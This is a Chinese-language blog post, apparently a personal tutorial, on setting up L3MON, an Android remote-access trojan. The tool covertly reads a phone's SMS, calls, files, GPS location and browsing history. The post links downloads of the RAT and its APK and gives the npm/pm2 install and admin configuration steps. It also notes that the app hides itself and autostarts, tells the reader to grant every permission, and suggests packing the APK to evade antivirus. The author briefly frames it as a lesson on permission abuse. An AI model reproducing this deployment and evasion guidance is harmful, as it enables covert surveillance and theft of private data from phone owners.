## 项目简介:
L3MON是一个基于web端的远程安卓管理套件,可以通过web端管理以下资料访问:
- 手机短信(可从云端收发短信)
- 通话记录、通话时长
- 手机系统的文件
- 手机安装的程序
- GPS定位
- 浏览器页面访问记录
### 视频示例(搬运)
<video width="100%" height="auto" controls="controls" preload="meta" src="https://video.gotarget.vip/A/android_l3mon/a.mp4">
</video>
## 项目搭建
- 程序下载:[程序包](https://owncloud.gotarget.top/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/hacker%E5%B7%A5%E5%85%B7/RAT/L3MON-v1.1.2.zip)
- 环境准备(windows,如果你是使用linux,请参见百度对应系统的环境安装)
- node环境:[程序下载](https://owncloud.gotarget.top/Windows/%E5%BC%80%E5%8F%91%E5%B7%A5%E5%85%B7/%E5%BC%80%E5%8F%91%E7%8E%AF%E5%A2%83/node.js/npm6%E7%8E%AF%E5%A2%83%EF%BC%88%E6%8E%A8%E8%8D%90%E4%BD%BF%E7%94%A8%EF%BC%89/node-v14.19.1-x64.msi)
- java环境(必须1.8):[程序下载](https://owncloud.gotarget.top/Windows/%E5%BC%80%E5%8F%91%E5%B7%A5%E5%85%B7/%E5%BC%80%E5%8F%91%E7%8E%AF%E5%A2%83/JAVA%E7%8E%AF%E5%A2%83/jdk-8u311-windows-x64.exe)
- 开始安装
- `npm install pm2 -g` <- 安装node保护程序
- cd 路径/L3MON <- 进入程序包
- `npm install ` <- 安装依赖
- `pm2 start index.js ` <-- 启动脚本
- `pm2 startup ` <- 在启动时运行 L3MON
- 配置程序
- `pm2 stop index`
- `maindb.json`在文本编辑器中打开
- 设置账号密码
```
在admin项下:
- 设置`username`为纯文本
- 设置`password`为 小写32位 MD5 哈希
(找一个md5加密站,填写实际密码,转换32位MD5小写字符串填写)
```
- `pm2 start all ` <-启动程序
- 在您的浏览器中导航到`http://<SERVER IP>:22533`
## 使用截图(实操)
### 设备管理
<img src="http://picture.gotarget.top/%E5%9B%BE%E7%89%87/typero/image-20220519111559409.png" />
### 短信管理
<img src="http://picture.gotarget.top/%E5%9B%BE%E7%89%87/typero/image-20220519112058275.png" alt="image-20220519112058275" style="zoom:67%;" />
### 文件管理
<img src="http://picture.gotarget.top/%E5%9B%BE%E7%89%87/typero/image-20220519111944623.png" alt="image-20220519111944623" style="zoom:67%;" />
## 安卓端截图
- 安装报毒(建议使用[VMOS](https://owncloud.gotarget.top/Android/%E5%B0%8F%E4%BC%97%E5%B7%A5%E5%85%B7/%E6%89%8B%E6%9C%BA%E8%99%9A%E6%8B%9F%E6%9C%BA/VMOSPro1.7.apk)手机虚拟机启用)
<img src="http://picture.gotarget.top/%E5%9B%BE%E7%89%87/typero/d9f9d6a7ad5a8c772516c54bcde323f.jpg" alt="d9f9d6a7ad5a8c772516c54bcde323f" style="zoom: 33%;" />
- 注意授权(权限全开)
<img src="http://picture.gotarget.top/%E5%9B%BE%E7%89%87/typero/af27ef7d0b5f61fc50304856cefd3cf.jpg" alt="af27ef7d0b5f61fc50304856cefd3cf" style="zoom: 33%;" />
- 后台权限使用情况(程序不出现桌面,默认隐藏自启动)
<img src="http://picture.gotarget.top/%E5%9B%BE%E7%89%87/typero/8a1da00451a32ed4099105fbfcdf913.jpg" alt="8a1da00451a32ed4099105fbfcdf913" style="zoom: 33%;" />
## 总结
本项目因为危害较大,已被各大手机厂商标记。故而安装需要输入手机密码方才能强制安装。同时,我们也可以通过其后台权限调用情况,大致获知目前大多安卓程序的严重信息违规问题。譬如许多程序都向您要求了太多非必要的手机权限,这极有可能造成您的信息被随意使用。
后续如果要对本程序进行处理的话,可以考虑加壳绕过杀软及手机厂商的标记,以达到成功上线的目的。但,也因为目前手机内较为严格的自启动管理服务,该项目的实际攻击意义不大。用以权限使用示例教学倒是一个不错的示例!
- 个人搭建的控制台:[传送门](http://android.gotarget.vip/login)
- 安卓木马程序:[下载](https://owncloud.gotarget.top/L3MON.apk) (普通下载后其实没啥事,只要不授予权限就好!)
- 项目源地址:[传送门](https://github.com/D3VL/L3MON)
WEB端Android控制台搭建及总结
